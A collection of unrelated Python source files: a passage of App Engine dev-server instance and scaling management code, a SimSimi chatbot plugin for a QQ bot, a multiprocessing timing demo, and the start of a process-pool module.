if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.ModuleAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.ModuleAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. "localhost".
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raises is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed-out while waiting for another one to complete']
def restart(self):
"""Restarts the the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ', str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
|
simsimi.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : cold
# E-mail : wh_linux@126.com
# Date : 14/01/16 11:33:32
# Desc : SimSimi插件
#
import json
from tornadohttpclient import TornadoHTTPClient
import config
import random
from plugins import BasePlugin
class SimSimiTalk(object):
""" 模拟浏览器与SimSimi交流
:params http: HTTP 客户端实例
:type http: ~tornadhttpclient.TornadoHTTPClient instance
"""
def __init__(self, http = None):
self.http = http or TornadoHTTPClient()
if not http:
self.http.set_user_agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36")
self.http.debug = getattr(config, "TRACE", False)
self.http.validate_cert = False
self.http.set_global_headers({"Accept-Charset": "UTF-8,*;q=0.5"})
self.url = "http://www.simsimi.com/func/req"
self.params = {"lc":"zh", "ft":0.0}
self.ready = False
self.fetch_kwargs = {}
if config.SimSimi_Proxy:
self.fetch_kwargs.update(proxy_host = config.SimSimi_Proxy[0],
proxy_port = config.SimSimi_Proxy[1])
self._setup_cookie()
def _setup_cookie(self):
def callback(resp):
self.ready = True
self.http.get("http://www.simsimi.com", callback = callback)
def talk(self, msg, callback):
""" 聊天
:param msg: 信息
:param callback: 接收响应的回调
"""
headers = {"Referer":"http://www.simsimi.com/talk.htm",
"Accept":"application/json, text/javascript, */*; q=0.01",
"Accept-Language":"zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
"Content-Type":"application/json; charset=utf-8",
"X-Requested-With":"XMLHttpRequest",
}
if not msg.strip():
return callback(u"小的在")
params = {"msg":msg.encode("utf-8")}
params.update(self.params)
def _talk(resp):
data = {}
if resp.body:
try:
data = json.loads(resp.body)
except ValueError:
pass
callback(data.get("。。。。"))
self.http.get(self.url, params, headers = headers,
callback = _talk)
class SimSimiPlugin(BasePlugin):
simsimi = None
def is_match(self, form_uin, content, type):
if not getattr(config, "SimSimi_Enabled", False):
return False
else:
self.simsimi = SimSimiTalk()
if type == "g" and random.choice('abcd')!='a':
if self.nickname !=None:
if content.startswith(self.nickname.strip()) or \
content.endswith(self.nickname.strip()) or \
content.startswith(config.QQ_GROUP_NICK.strip()) or \
content.endswith(config.QQ_GROUP_NICK.strip()) or \
content.startswith('@'+config.QQ_GROUP_NICK.strip()) or \
content.endswith('@'+config.QQ_GROUP_NICK.strip()):
self.content = content.strip(self.nickname).strip(config.QQ_GROUP_NICK.strip())
return True
else:
return False
else:
self.content = content
return True
return False
def handle_message(self, callback):
self.simsimi.talk(self.content, callback)
if __name__ == "__main__":
import threading,time
simsimi = SimSimiTalk()
def callback(response):
print response
simsimi.http.stop()
def talk():
while 1:
if simsimi.ready:
simsimi.talk("nice to meet you", callback)
break
else:
time.sleep(1)
t = threading.Thread(target = talk)
t.setDaemon(True)
t.start()
simsimi.http.start()
|
multiproc1.py
|
# multiproc1.py: Illustrate parallel processes
from multiprocessing import Process
import time
def fib(n):
last,curr = 0,1
return n if n in (last,curr) else fib(n-1) + fib(n-2)
if __name__ == '__main__': # This is important! (Launched process imports this module)
# First, do serial calls
start = time.perf_counter()
for n in range(10):
fib(31)
stop = time.perf_counter()
print('serially:',stop-start)
# Now in parallel (there will be some blocking, since 10 > #cpus)
procs = []
start = time.perf_counter()
for n in range(10):
proc = Process(target=fib,args=(31,))
procs.append(proc) # Keep process object to join later
proc.start() # Launch process
for proc in procs:
proc.join() # Wait for each process to finish
stop = time.perf_counter()
print('concurrently:',stop-start)
'''
serially: 9.321782736
concurrently: 5.4984390990000005
'''
|
pool.py
|
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import (
TERM_SIGNAL, human_status, pickle_loads, reset_signals, restart_state,
)
from .compat import get_errno, mem_rss, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
MAXMEM_USED_FMT = """\
child process exiting after exceeding memory limit ({0}KiB / {0}KiB)
"""
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by # any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = TERM_SIGNAL
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
util.get_logger().error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value)
self._initial_value = value
def grow(self):
with self._cond:
self._initial_value += 1
self._value += 1
self._cond.notify()
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def __init__(self, value=1, verbose=None):
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, str(self))
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True,
max_memory_per_child=None):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
